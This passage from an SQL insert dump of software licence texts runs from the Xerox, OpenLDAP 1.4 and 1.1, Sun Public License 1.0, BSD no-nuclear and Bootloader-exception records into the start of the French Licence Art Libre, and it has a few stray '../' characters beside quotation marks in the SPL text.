alleging\nthat the Package constitutes direct or contributory patent infringement, then\nthis Artistic License to you shall terminate on the date that such litigation\nis filed.\n\n (14) Disclaimer of Warranty:\n\nTHE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER AND CONTRIBUTORS \"AS IS\" AND\nWITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE IMPLIED WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT ARE DISCLAIMED TO THE\nEXTENT PERMITTED BY YOUR LOCAL LAW. UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER\nOR CONTRIBUTOR WILL BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL\nDAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF ADVISED\nOF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(325,'Xerox','Copyright (c) 1995, 1996 Xerox Corporation. All Rights Reserved.\n\nUse and copying of this software and preparation of derivative works based\nupon this software are permitted. Any copy of this software or of any derivative\nwork must include the above copyright notice of Xerox Corporation, this paragraph\nand the one after it. Any distribution of this software or derivative works\nmust comply with all applicable United States export control laws.\n\nThis software is made available AS IS, and XEROX CORPORATION DISCLAIMS ALL\nWARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE, AND NOTWITHSTANDING\nANY OTHER PROVISION CONTAINED HEREIN, ANY LIABILITY FOR DAMAGES RESULTING\nFROM THE SOFTWARE OR ITS USE IS EXPRESSLY DISCLAIMED, WHETHER ARISING IN CONTRACT,\nTORT (INCLUDING NEGLIGENCE) OR STRICT LIABILITY, EVEN IF XEROX CORPORATION\nIS ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(326,'OLDAP-1.4','The OpenLDAP Public License\n\nVersion 1.4, 18 January 1999\n\nCopyright 1998-1999, The OpenLDAP Foundation. All Rights Reserved. Note: This\nlicense is derived from the \"Artistic License\" as distributed with the Perl\nProgramming Language. As significant differences exist, the complete license\nshould be read.\n\nPREAMBLE\n\nThe intent of this document is to state the conditions under which a Package\nmay be copied, such that the Copyright Holder maintains some semblance of\nartistic control over the development of the package, while giving the users\nof the package the right to use and distribute the Package in a more-or-less\ncustomary fashion, plus the right to make reasonable modifications.\n\nDefinitions:\n\n\"Package\" refers to the collection of files distributed by the Copyright Holder,\nand derivatives of that collection of files created through textual modification.\n\n\"Standard Version\" refers to such a Package if it has not been modified, or\nhas been modified in accordance with the wishes of the Copyright Holder.\n\n\"Copyright Holder\" is whoever is named in the copyright or copyrights for\nthe package.\n\n\"You\" is you, if you\'re thinking about copying or distributing this Package.\n\n\"Reasonable copying fee\" is whatever you can justify on the basis of media\ncost, duplication charges, time of people involved, and so on. (You will not\nbe required to justify it to the Copyright Holder, but only to the computing\ncommunity at large as a market that must bear the fee.)\n\n\"Freely Available\" means that no fee is charged for the item itself, though\nthere may be fees involved in handling the item. It also means that recipients\nof the item may redistribute it under the same conditions they received it.\n\n1. You may make and give away verbatim copies of the source form of the Standard\nVersion of this Package without restriction, provided that you duplicate all\nof the original copyright notices and associated disclaimers.\n\n2. You may apply bug fixes, portability fixes and other modifications derived\nfrom the Public Domain or from the Copyright Holder. A Package modified in\nsuch a way shall still be considered the Standard Version.\n\n3. You may otherwise modify your copy of this Package in any way, provided\nthat you insert a prominent notice in each changed file stating how and when\nyou changed that file, and provided that you do at least ONE of the following:\n\na) place your modifications in the Public Domain or otherwise make them Freely\nAvailable, such as by posting said modifications to Usenet or an equivalent\nmedium, or placing the modifications on a major archive site such as uunet.uu.net,\nor by allowing the Copyright Holder to include your modifications in the Standard\nVersion of the Package.\n\n b) use the modified Package only within your corporation or organization.\n\nc) rename any non-standard executables so the names do not conflict with standard\nexecutables, which must also be provided, and provide a separate manual page\nfor each non-standard executable that clearly documents how it differs from\nthe Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n4. You may distribute the programs of this Package in object code or executable\nform, provided that you do at least ONE of the following:\n\na) distribute a Standard Version of the executables and library files, together\nwith instructions (in the manual page or equivalent) on where to get the Standard\nVersion.\n\nb) accompany the distribution with the machine-readable source of the Package\nwith your modifications.\n\nc) accompany any non-standard executables with their corresponding Standard\nVersion executables, giving the non-standard executables non-standard names,\nand clearly documenting the differences in manual pages (or equivalent), together\nwith instructions on where to get the Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n5. You may charge a reasonable copying fee for any distribution of this Package.\nYou may charge any fee you choose for support of this Package. You may not\ncharge a fee for this Package itself. However, you may distribute this Package\nin aggregate with other (possibly commercial) programs as part of a larger\n(possibly commercial) software distribution provided that you do not advertise\nthis Package as a product of your own.\n\n6. The scripts and library files supplied as input to or produced as output\nfrom the programs of this Package do not automatically fall under the copyright\nof this Package, but belong to whomever generated them, and may be sold commercially,\nand may be aggregated with this Package.\n\n7. C subroutines supplied by you and linked into this Package in order to\nemulate subroutines and variables defined by this Package shall not be considered\npart of this Package, but are the equivalent of input as in Paragraph 6, provided\nthese subroutines do not change the behavior of the Package in any way that\nwould cause it to fail the regression tests for the Package.\n\n8. Software supplied by you and linked with this Package in order to use subroutines\nand variables defined by this Package shall not be considered part of this\nPackage and do not automatically fall under the copyright of this Package.\nExecutables produced by linking your software with this Package may be used\nand redistributed without restriction and may be sold commercially so long\nas the primary function of your software is different than the package itself.\n\n9. The name of the Copyright Holder may not be used to endorse or promote\nproducts derived from this software without specific prior written permission.\n\n10. THIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,\nINCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTIBILITY AND\nFITNESS FOR A PARTICULAR PURPOSE. The End\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(327,'OLDAP-1.1','The OpenLDAP Public License\n\nVersion 1.1, 25 August 1998\n\nCopyright 1998, The OpenLDAP Foundation. All Rights Reserved. Note: This license\nis derived from the \"Artistic License\" as distributed with the Perl Programming\nLanguage. Its terms are different from those of the \"Artistic License.\"\n\nPREAMBLE\n\nThe intent of this document is to state the conditions under which a Package\nmay be copied, such that the Copyright Holder maintains some semblance of\nartistic control over the development of the package, while giving the users\nof the package the right to use and distribute the Package in a more-or-less\ncustomary fashion, plus the right to make reasonable modifications.\n\nDefinitions:\n\n\"Package\" refers to the collection of files distributed by the Copyright Holder,\nand derivatives of that collection of files created through textual modification.\n\n\"Standard Version\" refers to such a Package if it has not been modified, or\nhas been modified in accordance with the wishes of the Copyright Holder.\n\n\"Copyright Holder\" is whoever is named in the copyright or copyrights for\nthe package.\n\n\"You\" is you, if you\'re thinking about copying or distributing this Package.\n\n\"Reasonable copying fee\" is whatever you can justify on the basis of media\ncost, duplication charges, time of people involved, and so on. (You will not\nbe required to justify it to the Copyright Holder, but only to the computing\ncommunity at large as a market that must bear the fee.)\n\n\"Freely Available\" means that no fee is charged for the item itself, though\nthere may be fees involved in handling the item. It also means that recipients\nof the item may redistribute it under the same conditions they received it.\n\n1. You may make and give away verbatim copies of the source form of the Standard\nVersion of this Package without restriction, provided that you duplicate all\nof the original copyright notices and associated disclaimers.\n\n2. You may apply bug fixes, portability fixes and other modifications derived\nfrom the Public Domain or from the Copyright Holder. A Package modified in\nsuch a way shall still be considered the Standard Version.\n\n3. You may otherwise modify your copy of this Package in any way, provided\nthat you insert a prominent notice in each changed file stating how and when\nyou changed that file, and provided that you do at least ONE of the following:\n\na) place your modifications in the Public Domain or otherwise make them Freely\nAvailable, such as by posting said modifications to Usenet or an equivalent\nmedium, or placing the modifications on a major archive site such as uunet.uu.net,\nor by allowing the Copyright Holder to include your modifications in the Standard\nVersion of the Package.\n\n b) use the modified Package only within your corporation or organization.\n\nc) rename any non-standard executables so the names do not conflict with standard\nexecutables, which must also be provided, and provide a separate manual page\nfor each non-standard executable that clearly documents how it differs from\nthe Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n4. You may distribute the programs of this Package in object code or executable\nform, provided that you do at least ONE of the following:\n\na) distribute a Standard Version of the executables and library files, together\nwith instructions (in the manual page or equivalent) on where to get the Standard\nVersion.\n\nb) accompany the distribution with the machine-readable source of the Package\nwith your modifications.\n\nc) accompany any non-standard executables with their corresponding Standard\nVersion executables, giving the non-standard executables non-standard names,\nand clearly documenting the differences in manual pages (or equivalent), together\nwith instructions on where to get the Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n5. You may charge a reasonable copying fee for any distribution of this Package.\nYou may charge any fee you choose for support of this Package. You may not\ncharge a fee for this Package itself. However, you may distribute this Package\nin aggregate with other (possibly commercial) programs as part of a larger\n(possibly commercial) software distribution provided that you do not advertise\nthis Package as a product of your own.\n\n6. The scripts and library files supplied as input to or produced as output\nfrom the programs of this Package do not automatically fall under the copyright\nof this Package, but belong to whomever generated them, and may be sold commercially,\nand may be aggregated with this Package.\n\n7. C subroutines supplied by you and linked into this Package in order to\nemulate subroutines and variables of the language defined by this Package\nshall not be considered part of this Package, but are the equivalent of input\nas in Paragraph 6, provided these subroutines do not change the language in\nany way that would cause it to fail the regression tests for the language.\n\n8. The name of the Copyright Holder may not be used to endorse or promote\nproducts derived from this software without specific prior written permission.\n\n9. THIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,\nINCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTIBILITY AND\nFITNESS FOR A PARTICULAR PURPOSE. The End\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(328,'SPL-1.0','SUN PUBLIC LICENSE Version 1.0\n\n 1. Definitions.\n\n1.0.1. \"Commercial Use\" means distribution or otherwise making the Covered\nCode available to a third party.\n\n1.1. \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof\nand corresponding documentation released with the source code.\n\n1.4. \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.5. \"Executable\" means Covered Code in any form other than Source Code.\n\n1.6. \"Initial Developer\" means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.8. \"License\" means this document.\n\n1.8.1. \"Licensable\" means having the right to grant, to the maximum extent\npossible, whether at the time of the initial grant or subsequently acquired,\nany and all of the rights conveyed herein.\n\n1.9. \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10. \"Original Code\"../ means Source Code of computer software code which\nis described in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.10.1. \"Patent Claims\" means any patent claim(s), now owned or hereafter\nacquired, including without limitation, method, process, and apparatus claims,\nin any patent Licensable by grantor.\n\n1.11. \"Source Code\"../ means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ndocumentation, interface definition files, scripts used to control compilation\nand installation of an Executable, or source code differential comparisons\nagainst either the Original Code or another well known, available Covered\nCode of the Contributor\'s choice. The Source Code can be in a compressed or\narchival form, provided the appropriate decompression or de-archiving software\nis widely available for no charge.\n\n1.12. \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\"../ means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of more than fifty percent (50%)\nof the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n2.1 The Initial Developer Grant. The Initial Developer hereby grants You a\nworld-wide, royalty-free, non-exclusive license, subject to third party intellectual\nproperty claims:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Code (or portions thereof) with or without Modifications,\nand/or as part of a Larger Work; and\n\n(b) under Patent Claims infringed by the making, using or selling of Original\nCode, to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Code (or portions thereof).\n\n(c) the licenses granted in this Section 2.1(a) and (b) are effective on the\ndate Initial Developer first distributes Original Code under the terms of\nthis License.\n\n(d) Notwithstanding Section 2.1(b) above, no patent license is granted: 1)\nfor code that You delete from the Original Code; 2) separate from the Original\nCode; or 3) for infringements caused by:\n\n i) the modification of the Original Code or\n\nii) the combination of the Original Code with other software or devices.\n\n2.2. Contributor Grant. Subject to third party intellectual property claims,\neach Contributor hereby grants You a world-wide, royalty-free, non-exclusive\nlicense\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Contributor, to use, reproduce, modify, display, perform, sublicense and\ndistribute the Modifications created by such Contributor (or portions thereof)\neither on an unmodified basis, with other Modifications, as Covered Code and/or\nas part of a Larger Work; and\n\nb) under Patent Claims infringed by the making, using, or selling of Modifications\nmade by that Contributor either alone and/or in combination with its Contributor\nVersion (or portions of such combination), to make, use, sell, offer for sale,\nhave made, and/or otherwise dispose of: 1) Modifications made by that Contributor\n(or portions thereof); and 2) the combination of Modifications made by that\nContributor with its Contributor Version (or portions of such combination).\n\n(c) the licenses granted in Sections 2.2(a) and 2.2(b) are effective on the\ndate Contributor first makes Commercial Use of the Covered Code.\n\n(d) notwithstanding Section 2.2(b) above, no patent license is granted: 1)\nfor any code that Contributor has deleted from the Contributor Version; 2)\nseparate from the Contributor Version; 3) for infringements caused by: i)\nthird party modifications of Contributor Version or ii) the combination of\nModifications made by that Contributor with other software (except as part\nof the Contributor Version) or other devices; or 4) under Patent Claims infringed\nby Covered Code in the absence of Modifications made by that Contributor.\n\n 3. Distribution Obligations.\n\n3.1. Application of License. The Modifications which You create or to which\nYou contribute are governed by the terms of this License, including without\nlimitation Section 2.2. The Source Code version of Covered Code may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 6.1, and You must include a copy of this License with every\ncopy of the Source Code You distribute. You may not offer or impose any terms\non any Source Code version that alters or restricts the applicable version\nof this License or the recipients\' rights hereunder. However, You may include\nan additional document offering the additional rights described in Section\n3.5.\n\n3.2. Availability of Source Code. Any Modification which You create or to\nwhich You contribute must be made available in Source Code form under the\nterms of this License either on the same media as an Executable version or\nvia an accepted Electronic Distribution Mechanism to anyone to whom you made\nan Executable version available; and if made available via Electronic Distribution\nMechanism, must remain available for at least twelve (12) months after the\ndate it initially became available, or at least six (6) months after a subsequent\nversion of that particular Modification has been made available to such recipients.\nYou are responsible for ensuring that the Source Code version remains available\neven if the Electronic Distribution Mechanism is maintained by a third party.\n\n3.3. Description of Modifications. You must cause all Covered Code to which\nYou contribute to contain a file documenting the changes You made to create\nthat Covered Code and the date of any change. You must include a prominent\nstatement that the Modification is derived, directly or indirectly, from Original\nCode provided by the Initial Developer and including the name of the Initial\nDeveloper in (a) the Source Code, and (b) in any notice in an Executable version\nor related documentation in which You describe the origin or ownership of\nthe Covered Code.\n\n 3.4. Intellectual Property Matters.\n\n(a) Third Party Claims. If Contributor has knowledge that a license under\na third party\'s intellectual property rights is required to exercise the rights\ngranted by such Contributor under Sections 2.1 or 2.2, Contributor must include\na text file with the Source Code distribution titled \"../LEGAL\'\' which describes\nthe claim and the party making the claim in sufficient detail that a recipient\nwill know whom to contact. If Contributor obtains such knowledge after the\nModification is made available as described in Section 3.2, Contributor shall\npromptly modify the LEGAL file in all copies Contributor makes available thereafter\nand shall take other steps (such as notifying appropriate mailing lists or\nnewsgroups) reasonably calculated to inform those who received the Covered\nCode that new knowledge has been obtained.\n\n(b) Contributor APIs. If Contributor\'s Modifications include an application\nprogramming interface (\"API\"../) and Contributor has knowledge of patent licenses\nwhich are reasonably necessary to implement that API, Contributor must also\ninclude this information in the LEGAL file.\n\n(c) Representations. Contributor represents that, except as disclosed pursuant\nto Section 3.4(a) above, Contributor believes that Contributor\'s Modifications\nare Contributor\'s original creation(s) and/or Contributor has sufficient rights\nto grant the rights conveyed by this License.\n\n3.5. Required Notices. You must duplicate the notice in Exhibit A in each\nfile of the Source Code. If it is not possible to put such notice in a particular\nSource Code file due to its structure, then You must include such notice in\na location (such as a relevant directory) where a user would be likely to\nlook for such a notice. If You created one or more Modification(s) You may\nadd your name as a Contributor to the notice described in Exhibit A. You must\nalso duplicate this License in any documentation for the Source Code where\nYou describe recipients\' rights or ownership rights relating to Covered Code.\nYou may choose to offer, and to charge a fee for, warranty, support, indemnity\nor liability obligations to one or more recipients of Covered Code. However,\nYou may do so only on Your own behalf, and not on behalf of the Initial Developer\nor any Contributor. You must make it absolutely clear than any such warranty,\nsupport, indemnity or liability obligation is offered by You alone, and You\nhereby agree to indemnify the Initial Developer and every Contributor for\nany liability incurred by the Initial Developer or such Contributor as a result\nof warranty, support, indemnity or liability terms You offer.\n\n3.6. Distribution of Executable Versions. You may distribute Covered Code\nin Executable form only if the requirements of Section 3.1-3.5 have been met\nfor that Covered Code, and if You include a notice stating that the Source\nCode version of the Covered Code is available under the terms of this License,\nincluding a description of how and where You have fulfilled the obligations\nof Section 3.2. The notice must be conspicuously included in any notice in\nan Executable version, related documentation or collateral in which You describe\nrecipients\' rights relating to the Covered Code. You may distribute the Executable\nversion of Covered Code or ownership rights under a license of Your choice,\nwhich may contain terms different from this License, provided that You are\nin compliance with the terms of this License and that the license for the\nExecutable version does not attempt to limit or alter the recipient\'s rights\nin the Source Code version from the rights set forth in this License. If You\ndistribute the Executable version under a different license You must make\nit absolutely clear that any terms which differ from this License are offered\nby You alone, not by the Initial Developer or any Contributor. You hereby\nagree to indemnify the Initial Developer and every Contributor for any liability\nincurred by the Initial Developer or such Contributor as a result of any such\nterms You offer.\n\n3.7. Larger Works. You may create a Larger Work by combining Covered Code\nwith other code not governed by the terms of this License and distribute the\nLarger Work as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Covered Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute, judicial order,\nor regulation then You must: (a) comply with the terms of this License to\nthe maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the LEGAL file described\nin Section 3.4 and must be included with all distributions of the Source Code.\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A and to related Covered Code.\n\n 6. Versions of the License.\n\n6.1. New Versions. Sun Microsystems, Inc. (\"Sun\") may publish revised and/or\nnew versions of the License from time to time. Each version will be given\na distinguishing version number.\n\n6.2. Effect of New Versions. Once Covered Code has been published under a\nparticular version of the License, You may always continue to use it under\nthe terms of that version. You may also choose to use such Covered Code under\nthe terms of any subsequent version of the License published by Sun. No one\nother than Sun has the right to modify the terms applicable to Covered Code\ncreated under this License.\n\n6.3. Derivative Works. If You create or use a modified version of this License\n(which you may only do in order to apply it to code which is not already Covered\nCode governed by this License), You must: (a) rename Your license so that\nthe phrases \"Sun,\" \"Sun Public License,\" or \"SPL\"../ or any confusingly similar\nphrase do not appear in your license (except to note that your license differs\nfrom this License) and (b) otherwise make it clear that Your version of the\nlicense contains terms which differ from the Sun Public License. (Filling\nin the name of the Initial Developer, Original Code or Contributor in the\nnotice described in Exhibit A shall not of themselves be deemed to be modifications\nof this License.)\n\n 7. DISCLAIMER OF WARRANTY.\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"../AS IS\'\' BASIS, WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES THAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR\nA PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY\nAND PERFORMANCE OF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE\nDEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR)\nASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. TERMINATION.\n\n8.1. This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n8.2. If You initiate litigation by asserting a patent infringement claim (excluding\ndeclaratory judgment actions) against Initial Developer or a Contributor (the\nInitial Developer or Contributor against whom You file such action is referred\nto as \"Participant\") alleging that:\n\n(a) such Participant\'s Contributor Version directly or indirectly infringes\nany patent, then any and all rights granted by such Participant to You under\nSections 2.1 and/or 2.2 of this License shall, upon 60 days notice from Participant\nterminate prospectively, unless if within 60 days after receipt of notice\nYou either: (i) agree in writing to pay Participant a mutually agreeable reasonable\nroyalty for Your past and future use of Modifications made by such Participant,\nor (ii) withdraw Your litigation claim with respect to the Contributor Version\nagainst such Participant. If within 60 days of notice, a reasonable royalty\nand payment arrangement are not mutually agreed upon in writing by the parties\nor the litigation claim is not withdrawn, the rights granted by Participant\nto You under Sections 2.1 and/or 2.2 automatically terminate at the expiration\nof the 60 day notice period specified above.\n\n(b) any software, hardware, or device, other than such Participant\'s Contributor\nVersion, directly or indirectly infringes any patent, then any rights granted\nto You by such Participant under Sections 2.1(b) and 2.2(b) are revoked effective\nas of the date You first made, used, sold, distributed, or had made, Modifications\nmade by that Participant.\n\n8.3. If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Contributor Version directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4. In the event of termination under Sections 8.1 or 8.2 above, all end\nuser license agreements (excluding distributors and resellers) which have\nbeen validly granted by You or any distributor hereunder prior to termination\nshall survive termination.\n\n 9. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE INITIAL DEVELOPER, ANY\nOTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF\nANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL,\nOR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES\nFOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY\nAND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE\nBEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10. U.S. GOVERNMENT END USERS.\n\nThe Covered Code is a \"commercial item,\" as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of \"commercial computer software\" and \"commercial\ncomputer software documentation,\"../ as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. MISCELLANEOUS.\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by California law provisions (except to the extent\napplicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. With respect to disputes in which at least one party is a citizen\nof, or an entity chartered or registered to do business in the United States\nof America, any litigation relating to this License shall be subject to the\njurisdiction of the Federal Courts of the Northern District of California,\nwith venue lying in Santa Clara County, California, with the losing party\nresponsible for costs, including without limitation, court costs and reasonable\nattorneys\' fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License.\n\n 12. RESPONSIBILITY FOR CLAIMS.\n\nAs between Initial Developer and the Contributors, each party is responsible\nfor claims and damages arising, directly or indirectly, out of its utilization\nof rights under this License and You agree to work with Initial Developer\nand Contributors to distribute such responsibility on an equitable basis.\nNothing herein is intended or shall be deemed to constitute any admission\nof liability.\n\n 13. MULTIPLE-LICENSED CODE.\n\nInitial Developer may designate portions of the Covered Code as ?Multiple-Licensed?.\n?Multiple-Licensed? means that the Initial Developer permits you to utilize\nportions of the Covered Code under Your choice of the alternative licenses,\nif any, specified by the Initial Developer in the file described in Exhibit\nA. Exhibit A -Sun Public License Notice.\n\nThe contents of this file are subject to the Sun Public License Version 1.0\n(the License); you may not use this file except in compliance with the License.\nA copy of the License is available at http://www.sun.com/\n\nThe Original Code is _________________ . The Initial Developer of the Original\nCode is ___________ . Portions created by ______ are Copyright (C) _________\n. All Rights Reserved.\n\nContributor(s): ______________________________________ .\n\nAlternatively, the contents of this file may be used under the terms of the\n_____ license (the ?[___] License? ), in which case the provisions of [______]\nLicense are applicable instead of those above. If you wish to allow use of\nyour version of this file only under the terms of the [____] License and not\nto allow others to use your version of this file under the SPL, indicate your\ndecision by deleting the provisions above and replace them with the notice\nand other provisions required by the [___] License. If you do not delete the\nprovisions above, a recipient may use your version of this file under either\nthe SPL or the [___] License.\n\n[NOTE: The text of this Exhibit A may differ slightly from the text of the\nnotices in the Source Code files of the Original Code. You should use the\ntext of this Exhibit A rather than the text found in the Original Code Source\nCode for Your Modifications.]\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(329,'BSD-3-Clause-No-Nuclear-License-2014','Copyright © 2008, 2014 Oracle and/or its affiliates. All rights reserved.\n\nUse is subject to license terms.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n* Neither the name of Oracle Corporation nor the names of its contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nYou acknowledge that this software is not designed, licensed or intended for\nuse in the design, construction, operation or maintenance of any nuclear facility.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(330,'Bootloader-exception','Bootloader Exception \n\nIn addition to the permissions in the GNU General Public License, the authors give you unlimited permission to link or embed compiled bootloader and related files into combinations with other programs, and to distribute those combinations without any restriction coming from the use of those files. (The General Public License restrictions do apply in other respects; for example, they cover modification of the files, and distribution when not linked into a combined executable.)\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(331,'LAL-1.2','Licence Art Libre\n\n[ Copyleft Attitude ]\n\nVersion 1.2\n\nPréambule :\n\nAvec cette Licence Art Libre, l\'autorisation est donnée de copier, de diffuser\net de transformer librement les oeuvres dans le respect des droits de l\'auteur.\n\nLoin d\'ignorer les droits de l\'auteur, cette licence les reconnaît et les\nprotège. Elle en reformule le principe en permettant au public de faire un\nusage créatif des oeuvres d\'art.\n\nAlors que l\'usage fait du droit de la propriété littéraire et artistique conduit\nà restreindre l\'accès du public à l\'oeuvre, la Licence Art Libre a pour but\nde le 